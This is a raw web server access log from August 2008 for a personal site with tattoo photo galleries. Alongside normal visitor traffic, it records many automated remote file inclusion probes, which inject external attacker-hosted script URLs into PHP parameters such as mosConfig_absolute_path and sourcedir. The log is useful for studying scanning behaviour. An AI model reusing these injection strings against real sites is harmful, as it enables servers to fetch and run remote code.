70.84.182.98 - - [06/Aug/2008:23:25:58 -0500] "GET /logs/access_log.1208044800/oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
194.85.89.114 - - [06/Aug/2008:23:26:11 -0500] "GET /logs/access_log.1206230400/learnPath/include/scormExport.inc.php?includePath=http://www.grinchradio.com/diegar/did.txt%0D?? HTTP/1.1" 404 348 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
194.85.89.114 - - [06/Aug/2008:23:26:11 -0500] "GET /logs/learnPath/include/scormExport.inc.php?includePath=http://www.grinchradio.com/diegar/did.txt%0D?? HTTP/1.1" 404 326 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
194.85.89.114 - - [06/Aug/2008:23:26:11 -0500] "GET /learnPath/include/scormExport.inc.php?includePath=http://www.grinchradio.com/diegar/did.txt%0D?? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
66.79.163.110 - - [06/Aug/2008:23:26:22 -0500] "GET /logs/access_log.1213142400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:23:27:15 -0500] "GET /logs/access_log.1213315200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:23:27:32 -0500] "GET /logs/access_log.1208044800/?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:23:27:33 -0500] "GET /?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:23:27:33 -0500] "GET /logs/?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 94311 "-""libwww-perl/5.811"
217.23.156.36 - - [06/Aug/2008:23:29:24 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.23.156.36 - - [06/Aug/2008:23:29:25 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.23.156.36 - - [06/Aug/2008:23:29:26 -0500] "GET /logs/access_log.1206230400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.97.132.101 - - [06/Aug/2008:23:32:02 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 282 "-""libwww-perl/5.53"
66.79.163.110 - - [06/Aug/2008:23:33:16 -0500] "GET /?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
212.50.0.218 - - [06/Aug/2008:23:33:23 -0500] "GET /logs/index.php?sourcedir=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.50.0.218 - - [06/Aug/2008:23:33:23 -0500] "GET /index.php?sourcedir=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.200.202.55 - - [06/Aug/2008:23:34:00 -0500] "GET /logs/index.php?sourcedir=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
74.200.202.55 - - [06/Aug/2008:23:34:00 -0500] "GET /index.php?sourcedir=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
70.84.182.98 - - [06/Aug/2008:23:34:24 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 294 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
70.84.182.98 - - [06/Aug/2008:23:34:25 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 299 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
83.172.146.49 - - [06/Aug/2008:23:35:19 -0500] "GET /logs/access_log.1214438400/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.172.146.49 - - [06/Aug/2008:23:35:19 -0500] "GET /errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.172.146.49 - - [06/Aug/2008:23:35:19 -0500] "GET /logs/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.225.218.2 - - [06/Aug/2008:23:35:26 -0500] "GET /logs/index.php?sourcedir=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:23:35:26 -0500] "GET /index.php?sourcedir=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:23:35:27 -0500] "GET /logs/index.php?sourcedir=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:23:35:27 -0500] "GET /index.php?sourcedir=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
66.79.163.110 - - [06/Aug/2008:23:39:37 -0500] "GET /logs/?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 94311 "-""libwww-perl/5.811"
66.79.163.110 - - [06/Aug/2008:23:39:37 -0500] "GET /?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
67.15.181.24 - - [06/Aug/2008:23:40:47 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
67.15.181.24 - - [06/Aug/2008:23:40:47 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
216.55.159.47 - - [06/Aug/2008:23:40:55 -0500] "GET /logs/access_log.1214438400/?vsDragonRootPath=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
216.55.159.47 - - [06/Aug/2008:23:40:55 -0500] "GET /?vsDragonRootPath=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
91.121.143.183 - - [06/Aug/2008:23:40:56 -0500] "GET /logs/access_log.1209600000/!scanhttp://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 362 "-""libwww-perl/5.803"
216.55.159.47 - - [06/Aug/2008:23:40:56 -0500] "GET /logs/?vsDragonRootPath=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 94311 "-""libwww-perl/5.803"
91.121.143.183 - - [06/Aug/2008:23:40:56 -0500] "GET /!scanhttp://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
91.121.143.183 - - [06/Aug/2008:23:40:56 -0500] "GET /logs/!scanhttp://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
74.52.36.178 - - [06/Aug/2008:23:41:02 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://sujianto.com/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
74.52.36.178 - - [06/Aug/2008:23:41:02 -0500] "GET //skin/zero_vote/error.php?dir=http://sujianto.com/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
74.52.36.178 - - [06/Aug/2008:23:41:02 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://sujianto.com/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
74.52.36.178 - - [06/Aug/2008:23:41:02 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/error.php?dir=http://sujianto.com/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
74.52.36.178 - - [06/Aug/2008:23:41:23 -0500] "GET //skin/zero_vote/error.php?dir=http://sujianto.com/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
212.97.132.101 - - [06/Aug/2008:23:41:57 -0500] "GET /logs/?sourcedir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 200 94138 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:41:58 -0500] "GET /?sourcedir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 200 1231 "-""libwww-perl/5.53"
71.56.101.65 - - [06/Aug/2008:23:42:01 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.msn.com/results.aspx?q=vintage+tattoo&FORM=SSRE""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:01 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:02 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:08 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
212.97.132.101 - - [06/Aug/2008:23:42:09 -0500] "GET /logs/?sourcedir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 200 94138 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:42:09 -0500] "GET /?sourcedir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 200 1231 "-""libwww-perl/5.53"
74.32.91.70 - - [06/Aug/2008:23:42:21 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:21 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:22 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
71.56.101.65 - - [06/Aug/2008:23:42:34 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NET_mmhpset; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
74.32.91.70 - - [06/Aug/2008:23:42:49 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:50 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:50 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:50 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:50 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:50 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:51 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:51 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:51 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:51 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:42:51 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
212.97.132.101 - - [06/Aug/2008:23:42:54 -0500] "GET /logs/access_log.1208044800/oneadmin/calendar/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 328 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:42:54 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 301 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:42:54 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 306 "-""libwww-perl/5.53"
216.14.123.10 - - [06/Aug/2008:23:42:55 -0500] "GET /logs/access_log.1214438400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 355 "-""libwww-perl/5.65"
189.62.145.42 - - [06/Aug/2008:23:43:03 -0500] "GET /logs/access_log.1203638400//skin/zero_vote/error.php?dir=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 336 "-""libwww-perl/5.800"
189.62.145.42 - - [06/Aug/2008:23:43:03 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 314 "-""libwww-perl/5.800"
189.62.145.42 - - [06/Aug/2008:23:43:03 -0500] "GET //skin/zero_vote/error.php?dir=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 309 "-""libwww-perl/5.800"
189.62.145.42 - - [06/Aug/2008:23:43:03 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 336 "-""libwww-perl/5.800"
212.97.132.101 - - [06/Aug/2008:23:43:03 -0500] "GET /logs/access_log.1206230400/oneadmin/calendar/include.php?path[docroot]=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 328 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:43:27 -0500] "GET /logs/access_log.1212883200//config/dbutil.bck.php?confdir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 321 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:43:27 -0500] "GET //config/dbutil.bck.php?confdir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 294 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:43:27 -0500] "GET /logs//config/dbutil.bck.php?confdir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 299 "-""libwww-perl/5.53"
74.32.91.70 - - [06/Aug/2008:23:43:27 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:28 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:28 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
